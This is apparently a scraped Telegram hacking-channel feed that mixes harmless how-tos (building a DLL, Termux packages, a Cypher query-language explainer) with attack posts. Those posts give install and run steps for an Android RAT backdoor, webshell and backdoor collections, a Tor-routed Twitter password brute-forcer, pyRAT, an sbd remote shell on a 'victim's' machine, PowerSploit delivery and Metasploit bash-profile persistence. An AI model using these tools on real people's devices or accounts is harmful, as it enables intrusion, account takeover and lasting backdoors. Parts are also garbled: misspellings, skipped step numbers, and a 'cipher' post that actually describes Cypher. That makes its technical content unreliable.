UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.3K links
๐Ÿฆ‘ Undercode Cyber World!
@UndercodeCommunity


1๏ธโƒฃ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2๏ธโƒฃ Cyber & Tech NEWS:
@Undercode_News

3๏ธโƒฃ CVE @Daily_CVE

โœจ Web & Services:
โ†’ Undercode.help
Download Telegram
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘HOW TO CREATE .DLL FILES ?
DLL files are dynamic-linked library files written and controlled with .DLLs make sharing, storing, and saving your code simple.we will show you how to create a DLL file with Visual Studio, the Windows application, or Visual Studio for Mac. Make sure you have โ€œDesktop Development with C++โ€ checked when you install. If you already have Visual Studio but didnโ€™t check that box, you can run the installer again to make sure you do.
powered by wiKi
instagram.com/UnderCodeTestingCompany

๐Ÿฆ‘๐Ÿ…ป๐Ÿ…ด๐Ÿ†ƒ ๐Ÿ†‚ ๐Ÿ†‚๐Ÿ†ƒ๐Ÿ…ฐ๏ธ๐Ÿ†๐Ÿ†ƒ:

1) Open Visual Studio. You can find this in your Start Menu or Applications folder. Since a DLL is a library of information, it is only one piece of a project, and usually requires an accompanying app to access it.

> You can get Visual Studio for Windows here: https://docs.microsoft.com/en-us/visualstudio/install/install-visual-studio?view=vs-2019

> Visual Studio for Mac can be downloaded here: https://docs.microsoft.com/en-us/visualstudio/mac/installation?view=vsmac-2019

2) Click New and Project. The โ€œCreate a New Projectโ€ dialog box will pop up.

3)
Set the options for Language, Platform, and Project Type. These will filter what kinds of project templates appear.

> Click Language to get a drop-down menu and click C++.

4) Click Platform to get a drop-down menu and click Windows.

5) Click Dynamic-link Library (DLL). Your choice will highlight blue. Click Next to continue.

6) Type a name in the Name Box for the project. For example, type โ€œMathLibraryโ€ in the box for a sample name.

7) Click Create. The DLL project is created.

8)
Add a header file to the DLL. You can do this by clicking โ€œAdd New Itemโ€ from โ€œProjectโ€ in the menu bar.

> Select Visual C++ from the left menu of the dialog box.

> Select Header file (.h) from the center of the dialog box.

> Type the name as โ€œMathLibrary.hโ€ in the name field below the menu choices.

> Click Add to generate the blank header file.

9) Type the following code into the blank header file:

// MathLibrary.h - Contains declarations of math functions
#pragma once

#ifdef MATHLIBRARY_EXPORTS
#define MATHLIBRARY_API __declspec(dllexport)
#else
#define MATHLIBRARY_API __declspec(dllimport)
#endif

// The Fibonacci recurrence relation describes a sequence F
// where F(n) is { n = 0, a
// { n = 1, b
// { n > 1, F(n-2) + F(n-1)
// for some initial integral values a and b.
// If the sequence is initialized F(0) = 1, F(1) = 1,
// then this relation produces the well-known Fibonacci
// sequence: 1, 1, 2, 3, 5, 8, 13, 21, 34, ...

// Initialize a Fibonacci relation sequence
// such that F(0) = a, F(1) = b.
// This function must be called before any other function.
extern "C" MATHLIBRARY_API void fibonacci_init(
const unsigned long long a, const unsigned long long b);

// Produce the next value in the sequence.
// Returns true on success and updates current value and index;
// false on overflow, leaves current value and index unchanged.
extern "C" MATHLIBRARY_API bool fibonacci_next();

// Get the current value in the sequence.
extern "C" MATHLIBRARY_API unsigned long long fibonacci_current();

// Get the position of the current value in the sequence.
extern "C" MATHLIBRARY_API unsigned fibonacci_index();

12) Add a CPP file to the DLL. You can do this by clicking Add New Item from โ€œProjectโ€ in the menu bar.

> Select โ€œVisual C++โ€ from the left menu of the dialog box.

> Select โ€œC++ File (.cpp)โ€ from the center of the dialog box.

> Type the name as โ€œMathLibrary.cppโ€ in the name field below the menu choices.

> Click Add to generate the blank file.

+ ADd ANY EXtra code for fonctional you need

13) Click Build in the menu bar. Youโ€™ll find this either above the project space (Windows) or along the top of your screen (Macs).

@ ฬตอ‘Steave(tm)
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘BEST & Dangeous 2019 VIRUS INFECTIONS:
facebook.com/UnderCodeTestingCompanie

๐Ÿฆ‘๐Ÿ…ป๐Ÿ…ด๐Ÿ†ƒ ๐Ÿ†‚ ๐Ÿ†‚๐Ÿ†ƒ๐Ÿ…ฐ๏ธ๐Ÿ†๐Ÿ†ƒ:

1) Direct Action Virus

Direct action viruses attack certain types of files, typically .exe and .com files. The main purpose of this virus is to replicate and infect files in folders. On the lighter note, they do not typically delete files or affect PC performance and speed. It can be easily removed by antivirus programs.
Browser Hijacker

> This type of virus infects your web browser in which it will bring you to different websites. Typically, if you key in a domain name in the internet address bar, the browser hijacker will open multiple fake websites that may harm your computer. On the other hand, most trusted browsers have built-in features to block them ahead.

2) Overwrite Virus

From the name itself, this virus overwrites the content of a file, losing the original content. It infects folders, files, and even programs. To delete this virus, you also need to get rid of your file. Thus, it is important to back up your data.

3) Web Scripting Virus

This virus lives in certain links, ads, image placement, videos, and layout of a website. These may carry malicious codes in which when you click, the viruses will be automatically downloaded or will direct you to malicious websites.

4) Boot Sector Virus

Boot sector viruses affect floppy disks. They came to existence when floppy disks are important in booting a computer. Although they are not very common today, it is still causing other computer units, especially the outdated ones. Some examples include Polyboot.B and AntiEXE.

5) Macro Virus

Macro viruses target applications and software that contain macros. These viruses can carry out series of operations affecting the performance of the program or software. Some examples of macro viruses are O97M/Y2K, Bablas, Melissa.A, and Relax.

6) Directory Virus

Directory viruses change file paths. When you run programs and software that are infected with directory viruses, the virus program also runs in the background. Further, it may be difficult for you to locate the original app or software once infected with directory viruses.

7) Polymorphic Virus

Polymorphic viruses use a special method of encoding or encryption every time they infect a system. With this, antivirus software finds it hard to locate then using signature searches. They are also capable of replicating easily. Polymorphic viruses include Satan Bug, Elkern, Tuareg, and Marburg.

8) File Infector Virus

This virus also infects executable files or programs. When you run these programs, the file infector virus is activated as well which can slow down the program and produce other damaging effects. A large block of existing viruses belongs to this category.

9) Encrypted Virus

This type of virus uses encrypted malicious codes which make antivirus software hard to detect them. They can only be detected when they decrypt themselves during replication. Although they donโ€™t delete files or folders, they can badly affect PC performance.

10) Companion Virus

This is a type of virus that doesnโ€™t survive without accompanying an existing file or folder. In order to carry out damages, the file or folder being accompanied by companion viruses should be opened or run. Some examples of companion viruses include Terrax.1069, Stator, and Asimov.1539.

11) Network Virus

Basically, this type of virus spreads out through Local Network Area (LAN) and through the internet. These viruses replicate through shared resources, including drives and folders. When network viruses enter a computer, they look for their potential prey. Dangerous network viruses include Nimda and SQLSlammer.

12) Nonresident Virus

Nonresident viruses replicate through modules. When the module is executed, it will select one or more files to infect.
Stealth Virus

@ ฬตอ‘Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(tm
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ Android Remote Administration Tool A-RAT For Termux
instagram.com/UnderCodeTestingCompany

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

1) git clone https://github.com/AhMyth/AhMyth-Android-RAT.git

2) cd AhMyth-Android-RAT/AhMyth-Server

3) npm start

OR

1) Download a binary from https://github.com/AhMyth/AhMyth-Android-RAT/releases

2) Java (to generate apk backdoor)

๐Ÿฆ‘Features:

> Server side : desktop application based on electron framework (control panel)

> Client side : android application (backdoor)

@Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(tm
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘ How To Setup a transparent proxy to forward all TCP and DNS traffic through a SOCKS / SOCKS5 or HTTP(CONNECT) proxy using iptables -j REDIRECT target
instagram.com/UnderCodeTestingCompany

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

Termux/Linux

1) git clone https://github.com/n1nj4sec/pr0cks

2) cd pr0cks?

3) use the socks5 proxy of openssh (the option -D)

> ssh -D 1080 user@sshserver

4) then you can add some iptables rules :

> iptables -t nat -A OUTPUT ! -d <my_ssh_server_IP>/32 -o eth0 -p tcp -m tcp -j REDIRECT --to-ports 10080

> iptables -t nat -A OUTPUT -o eth0 -p udp -m udp --dport 53 -j REDIRECT --to-ports 1053

5) then start pr0cks :

6) python pr0cks.py --proxy SOCKS5:127.0.0.1:1080

7) All your TCP traffic and DNS traffic should now pass through the ssh server kinda like if you had setup a tun VPN through ssh but without admin rights on the server ! #help

8) python pr0cks.py -h

๐Ÿฆ‘Features:

> support UDP (with socks5)

> support proxy chaining

> set up a local transparent proxy compatible with socks4 socks5 and HTTP CONNECT proxies allowing to forward any TCP traffic transparently using iptables

> set up a local transparent DNS proxy translating UDP port 53 requests to TCP allowing DNS traffic to go through a proxy without UDP support (like ssh -D option)

> DNS caching mechanism to speed up the DNS resolutions through pr0cks


@Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(tm
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Powersploit tutorial:
t.me/UndercOdeTestingOfficial

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

This is a tool that is for Windows machines. It has PowerShell installed in victims machine. This tool helps the hacker to connect with the victimโ€™s machine via PowerShell.

1) To open it, open the terminal on the left and type the following command to enter into the powersploit folder โˆ’

> cd /usr/share/powersploit/
(in kali)

2) If you type โ€œlsโ€ it will list all the powersploit tools that you can download and install in the victimโ€™s machine after you have gained access. Most of them are name self-explained according to their names.

3) An easy way to download this tool on the victimโ€™s machine is to create a web server, which powersploit tools allow to create easily using the following command โˆ’

> python -m SimpleHTTPServer

4) After this,

> type: http://<Kali machine ip_address>:8000/

5)Choose Option

E N J O Y

@ Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(tm
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Sbd kali Linux Tool:

> sbd is a tool similar to Netcat with some improuvements :
instagram.com/UnderCodeTestingCompany

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

It is portable and can be used in Linux and Microsoft machines. sbd features AES-CBC-128 + HMAC-SHA1 encryption> Basically, it helps to connect to a victimโ€™s machine any time on a specific port and send commands remotely.

1) To open it, go to the terminal and type โ€œsbd -l -p portโ€ for the server to accept connections

2) port 44 where the server will listen.

3) On the victimโ€™s site, type โ€œsbd IPofserver portโ€. A connection will be established where we can send the remote commands.

In this case, it is โ€œlocalhostโ€ since we have performed the test on the same machine

4) on the server you will see that a connection has occurred

That all!

@ Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(tm
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Manual Recommended Building packages On Termux:
Using Termux build environment
t.me/UnderCodeTestingOfficial

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

> On-device usage

It is possible to use build environment directly on device without Docker image or VM setup. You need only to:

1) Clone the git repository:

> git clone https://github.com/termux/termux-packages

2) Execute setup script:

3) cd termux-packages

4) ./scripts/setup-termux.sh

5) Packages are built by executing

> ./build-package.sh -I package_name.

6) Note that option "-I" tells build-package.sh to download and install dependency packages automatically instead of building them which makes build a lot faster.

7) By default, with Termux build environment you can build only existing packages. If package is not exist in ./packages directory, then you will have to write its build.sh manually.

๐Ÿฆ‘There no universal guide about building/porting packages in Termux, especially since Termux isn't a standard platform.

> Though you can follow some recommendations mentioned here:

8) Make sure that minimal set of build tools is installed:

> pkg install build-essential

9) After extracting package source code, check for files named like "README" or "INSTALL". They usually contain information about how to build a package.

10 ) Autotools based projects (have ./configure script in project's root) in most cases can be built with the following commands:

> ./configure --prefix=$PREFIX

> make && make install

It is highly recommended to check the accepted configuration options by executing ./configure --help.

In case of configuration failure, read the output printed on screen and check the file config.log (contains a lot of text, but all information about error's source exist in it).

11) CMake based projects (have CMakeLists in project's root) should be possible to build with:

> mkdir build

> cd build

> cmake -DCMAKE_INSTALL_PREFIX="${PREFIX}" ..

> make

> make install

12) Be careful when running make install as it will unconditionally write files to $PREFIX. Never execute any of build commands as root.

13) Note about "bug reports": if you trying to build custom package and it fails, do not submit bug reports regarding it.

@ Steaven(jk)
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Webshell && Backdoor Collection For Termux & Any Linux Distro :
t.me/UnderCodeTestingOfficial

๐Ÿฆ‘๐Ÿ…ป๐Ÿ…ด๐Ÿ†ƒ ๐Ÿ†‚ ๐Ÿ†‚๐Ÿ†ƒ๐Ÿ…ฐ๏ธ๐Ÿ†๐Ÿ†ƒ:

1) To get all at oNCE (laqrge file)

> git clone https://github.com/xl7dev/WebShell

2) cd WebShell

3) Direct download

Zip file:

> https://github.com/xl7dev/WebShell/zipball/master

tar.gz file :

> https://github.com/xl7dev/WebShell/tarball/master

@ Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(tm
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘How to fix Instagram issues with Facebook Permissions?
instagram.com/UnderCodeTestingCompany

๐Ÿฆ‘๐Ÿ…ป๐Ÿ…ด๐Ÿ†ƒ ๐Ÿ†‚ ๐Ÿ†‚๐Ÿ†ƒ๐Ÿ…ฐ๏ธ๐Ÿ†๐Ÿ†ƒ:

> If you accidentally delete Instagram from your Facebook account, you wonโ€™t be able to post from Instagram to Facebook. You can use these steps to re-connect Instagram and Facebook.

1) Delete Instagram and Facebook from your phone.

2) Go to your Facebook settings and remove Instagram permissions.

3) Install Instagram and Facebook, then connect them again.


4) If your pictures are showing on the newsfeed, Instagram and Facebook are aware of the issue and working on it.

5) If followers canโ€™t see your Instagram posts on Facebook, you may have to change Facebook Instagram permissions.

6) In cases where you see an error that says โ€œYour Instagram album is full-on Facebook,โ€ you can change the name of your Instagram album on Facebook and a new one will show up when you share with Facebook again.

@ Steaven(jk)
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘What is The new New module: Bash Profile Persistence In Metasploite (few days ago)
t.me/iOsDeveloppers

๐Ÿฆ‘๐Ÿ…ป๐Ÿ…ด๐Ÿ†ƒ ๐Ÿ†‚ ๐Ÿ†‚๐Ÿ†ƒ๐Ÿ…ฐ๏ธ๐Ÿ†๐Ÿ†ƒ:

This module establishes persistence via the Linux Bash profile method.
This module makes two changes to the target system.

> First, the module writes a payload to a directory (/var/temp/ by default).

> Second, the module writes a payload execution trigger to the Bash profile (~/.bashrc by default).
The persistent payload is executed whenever the victim user opens a Bash terminal.

1) Start msfconsole

2) Get a Linux Meterpreter session

3) use exploit/linux/local/bash_profile_persistence

4) set SESSION [SESSION]

5) run

6) Start a Meterpreter handler

7) On victim, open a new Bash terminal; you should get a new session with the permissions of the exploited user account

@ Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(tm
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Hack Memory( dump data) drizzleDumper For Termux
instagram.com/UndercOdeTestingCompany

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

1) git clone https://github.com/DrizzleRisk/drizzleDumper

2) cd drizzleDumper

3) ./drizzleDumper package_name wait_times(s)

4) More Fom Chineese:

> drizzleDumper https://github.com/DrizzleRisk/drizzleDumper

> TUnpacker https://github.com/DrizzleRisk/TUnpacker

> BUnpacker https://github.com/DrizzleRisk/BUnpacker

@ Steaven(jk)
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Good memory scanner for Linux :
scanmem is a debugging utility designed to isolate the address of an arbitrary variable in an executing process. scanmem simply needs to be told the pid of the process and the value of the variable at several different times.

> After several scans of the process, scanmem isolates the position of the variable and allows you to modify its value.
GUI
t.me/UnderCodeTestingOfficial

๐Ÿฆ‘FEATURES :

> Flexible syntax for searching

> Easier and multiple variable locking

> Better process finder

> Memory browser/editor

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

1) git clone https://github.com/scanmem/scanmem

2) cd scanmem

3) ./autogen.sh

4) To build with GUI:

> ./configure --prefix=/usr --enable-gui && make
sudo make install

5) To build without GUI:

> ./configure --prefix=/usr && make

6) sudo make install

> scanmem and GameConqueror use static paths to libscanmem. So executing ldconfig is not required. Consider setting --libdir=/usr/lib/scanmem or --libdir=/usr/lib64/scanmem to avoid that libscanmem is in a library search path.

7) Run ./configure --help for more details.

@ Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(tm
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Hack Twitter Multi-thread Twitter BruteForcer in Shell Script Termux/ or Any Linux
Facebook.com/UndercodeTestingCompanie

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

1) git clone https://github.com/thelinuxchoice/tweetshell

2) cd tweetshell

3) chmod +x tweetshell.sh

4) service tor start

5) sudo ./tweetshell.sh

๐Ÿฆ‘Features:

> Multi-thread (400 pass/min, 20 threads)

> Anonymous attack through TOR

> Default password list (best +39k 8 letters)

> Check valid username

> Check and Install all dependencies

> Save/Resume sessions

@ Steaven(kf)
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘Windows Hacking :
Note
>Usage of pyRAT for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
t.me/iOsDeveloppers

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

1) wget https://www.python.org/ftp/python/2.7.15/python-2.7.15.msi
wine msiexec /i python-2.7.15.msi /L*v log.txt

2) dpkg --add-architecture i386 && apt-get update && apt-get install wine32

3) cd ~/.wine/drive_c/Python27/

4) wine python.exe Scripts/pip.exe install pyinstaller paramiko

5) #Configuring PHP (received file size)

> sed -i -e 's+upload_max_filesize = 2M+upload_max_filesize = 100M+g' $(php -i | grep -i "loaded configuration file" | cut -d ">" -f2)

6) git clone https://github.com/thelinuxchoice/pyRAT

7) cd pyRAT

8) bash pyrat.sh

@ Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(tm
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
[ Photo ]
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘WHAT IS CIPHER ?
instagram.com/UnderCodeTestingCompany

๐Ÿฆ‘๐Ÿ…ป๐Ÿ…ด๐Ÿ†ƒ ๐Ÿ†‚ ๐Ÿ†‚๐Ÿ†ƒ๐Ÿ…ฐ๏ธ๐Ÿ†๐Ÿ†ƒ:

> Cypher is Neo4jโ€™s graph query language that allows users to store and retrieve data from the graph database

> Cypherโ€™s syntax provides a visual and logical way to match patterns of nodes and relationships in the graph. It is a declarative, SQL-inspired language for describing visual patterns in graphs using ASCII-Art syntax. It allows us to state what we want to select, insert, update, or delete from our graph data without a description of exactly how to do it. Through Cypher, users can construct expressive and efficient queries to handle needed create, read, update, and delete functionality.

> It is backed by several companies in the database industry and allows implementors of databases and clients to freely benefit from, use, and contribute to the development of the openCypher language.

>Some syntax in Cypher requires a specific style or casing, while other Cypher syntax is not particular on styling. In either case, we have compiled some of the recommended and required styling for writing Cypher queries. This guide will walk through various components of typical syntax to help you write logical and readable Cypher queries.

> Cypher for a SQL Developer

Cypher was based upon the power and capabilities of SQL โ€“ the standard for querying relational databases. However, Cypher was designed and optimized specifically for graph data and traversals. While neither language is better or worse, they each have their strengths and purposes.

>Extending Cypher Functionality

Cypher provides powerful capabilities out-of-the-box. However, developers may need or want additional functionality for business cases or special scenarios. Extending Cypher in Neo4j is simple with user-defined procedures and functions.

User-defined procedures and functions can be written for a variety of cases and simple or complex operations. This guide will show you how to create custom add-ons and how to compile them so that the database recognizes it as part of Cypher.

@ Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(tm
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–

๐Ÿฆ‘HOW HACK CIPHERS ?
instagram.com/UndercOdeTestingCompany

๐Ÿฆ‘๐•€โ„•๐•Š๐•‹๐”ธ๐•ƒ๐•ƒ๐•€๐•Š๐”ธ๐•‹๐•€๐•†โ„• & โ„๐•Œโ„•:

KALI/TERMUX

1) git clone https://github.com/asweigart/codebreaker

2) cd codebreaker

3) NOW START THE PYTHON PROGRAMS :

๐Ÿฆ‘COMMANDS :

1) affineBreaker.py Break Affine Cipher-encrypted messages.

2) affineCipher.py Encrypt and decrypt using the Affine Cipher.

3) al_sweigart_privkey.txt A sample private key file that is used by the rsaCipher.py program.

4) al_sweigart_pubkey.txt A sample public key file that is used by the rsaCipher.py program.

5) buggy.py Used as practice for using Python's debugger.

6) caesarBreaker.py Break Caesar Cipher-encrypted messages.

7) caesarCipher.py Encrypts and decrypts using the Caesar Cipher.

8) coinFlips.py Used as practice for using Python's debugger.

9)- detectEnglish.py Used to detect if a string is English.

10) dictionary.txt A dictionary file of English words, one per line.

11) encrypted_file.txt A sample encrypted file from the

12) frankenstein.txt A large text file sample. (The public domain novel Frankenstein.)

13) freqFinder.py Module for gathering letter frequency statistics.

14) makeRsaKeys.py Generate a public/private RSA key pair.

15) nullBreaker.py Breaks Null Cipher-encrypted messages.

16) nullCipher.py Encrypts and decrypts using the Null Cipher.

17) primeSieve.py Generates prime numbers using the Sieve of Erastothenes algorithm

18) pyperclip.py A module for copying and pasting to the clipboard. This source code isn't going to be featured in the book, and is only included so that people can test the programs that use it.

19) rabinMiller.py Module for primality testing using the Rabin-Miller algorithm.

> README.md The file that you are reading right now, silly. :D

20) reverseCipher.py Encrypts with the reverse "cipher", which just reverse the string.

21) rsaCipher.py Encrypts and decrypts using the RSA Cipher.

22) simpleSubBreaker.py Breaks Simple Substitution Cipher-encrypted messages.

23) simpleSubCipher.py Encrypts and decrypts using the Simple Substitution Cipher.

24) simpleSubKeyword.py Encrypts and decrypts using the Simple Substitution Cipher, using an English word for the key.

25) transpositionBreaker.py Breaks Transposition Cipher-encrypted messages.

26) transpositionCipherFile.py Encrypts and decrypts files using the Transposition Cipher.

270transpositionDecrypt.py Decrypts messages using the Transposition Cipher.

28)transpositionEncrypt.py Encrypts messages using the Transposition Cipher.

29)transpositionFileBreaker.py Breaks Transposition Cipher-encrypted files.

30)transpositionTest.py Tests to see if the Transposition Cipher program works.

31)vigenereBreaker.py Breaks Vigenere Cipher-encrypted messages.

32)vigenereCipher.py Encrypts and decrypts using the Vigenere Cipher.


@ Mฬตอ˜ ฬ ฬ–rฬถฬ•.ฬตฬ ฬทอ Bฬดอ˜Oฬทฬ“Tฬถฬ†NฬดฬEฬถอ›Tฬถฬ…(tm
โ– โ–‚ โ–„ ๏ฝ•๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–
HACK CIPHER FULL ๐Ÿฆ‘.pdf
4 MB